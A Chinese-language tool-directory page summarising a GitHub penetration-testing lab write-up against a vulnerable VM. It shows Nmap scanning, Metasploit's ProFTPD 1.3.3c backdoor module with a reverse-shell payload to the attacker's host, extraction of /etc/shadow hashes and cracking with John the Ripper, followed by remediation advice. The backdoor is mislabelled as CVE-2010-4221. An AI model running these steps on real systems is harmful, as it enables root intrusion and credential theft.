Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mafiosohack/offensive-lab-2
密码破解侦察漏洞利用框架端口扫描漏洞分析漏洞利用后渗透利用CTF渗透测试学习与教育实验室与实践
GitHubmafiosohack/offensive-lab-2
59个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Offensive-lab-2

在易受攻击的Ubuntu虚拟机上进行的渗透测试演练。利用ProFTPD 1.3.3c后门(CVE-2010-4221)获取root访问权限并获取旗帜。包括Nmap枚举、Metasploit有效载荷设置以及用户哈希破解(John the Ripper)。

查看仓库

攻击性安全实验室
: ProFTPD 1.3.3c 后门漏洞利用(获取 root 标志)

  1. 介绍与目标

本报告详细介绍了对一台存在漏洞的 Linux 虚拟机 (VM) 进行的渗透测试,重点关注识别一个高风险服务漏洞,该漏洞允许直接获取 root 权限。

详情值
目标 IP 地址[ 192.168.222.130]
攻击者 IP 地址 (LHOST)[ 192.168.222.128]
目标操作系统Ubuntu 4ubuntu2.2 (Linux 内核 3.x)
目标获取 Root 级别的 shell 并检索 flag 文件。
  1. 初始枚举与漏洞识别

初始侦察包括使用 Nmap 进行服务扫描,以识别开放端口和服务版本。

命令:

root@kitploit:~
sudo nmap -sS -sV 192.168.222.130

主要发现: | 端口 | 服务 | 版本 | 风险 | | :--- | :--- | :--- | :--- | 21/tcp | ftp | ProFTPD 1.3.3c | 严重(可利用的后门) | | 22/tcp | ssh | OpenSSH 7.2p2 | 低(标准服务) | | 80/tcp | http | Apache httpd 2.4.18 | 低(未发现明显 Web 漏洞) |

随后的漏洞脚本扫描确认了 FTP 服务中存在一个高度关键的后门。 Nmap 脚本输出明确显示了以 root 用户身份执行命令:

| ftp-proftpd-backdoor: | 本安装已被植入后门。 | 命令: id |_ 结果: uid=0(root) gid=0(root) groups=0(root)...

  1. 漏洞利用与 Root Shell 获取

使用 Metasploit 框架来利用已确认的 ProFTPD 后门。

漏洞利用步骤: 启动 Metasploit:msfconsole

选择漏洞利用模块:use exploit/unix/ftp/proftpd_133c_backdoor

设置选项:

Bash

set RHOSTS 192.168.222.130 set PAYLOAD cmd/unix/reverse set LHOST 192.168.222.128

结果:成功建立了一个命令 shell 会话,直接授予了 root 权限(uid=0)。

  1. 后渗透与 Flag 检索 凭据收集 从 /etc/shadow 中提取了系统的用户哈希,用于后渗透分析。用户 marlinspike 的哈希已使用 John the Ripper 成功破解。

使用的命令(在攻击者机器上):

Bash

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 已破解的凭据:

用户: marlinspike

密码: marlinspike

  1. 修复建议

由于 FTP 服务受损,该系统的安全态势极其薄弱。必须立即采取措施来保护系统:

立即修补/升级:必须立即修补或升级 ProFTPD 服务到安全版本(大于 1.3.3g),以修复已知后门及相关 CVE。

移除服务:如果系统功能不需要 FTP,则应完全移除该服务。

防火墙:实施严格的防火墙规则(iptables/ufw),阻止外部访问端口 21。

安全 Shell 配置:审查 SSH 配置,禁用 root 登录并强制使用密钥认证。 执行:exploit

下载工具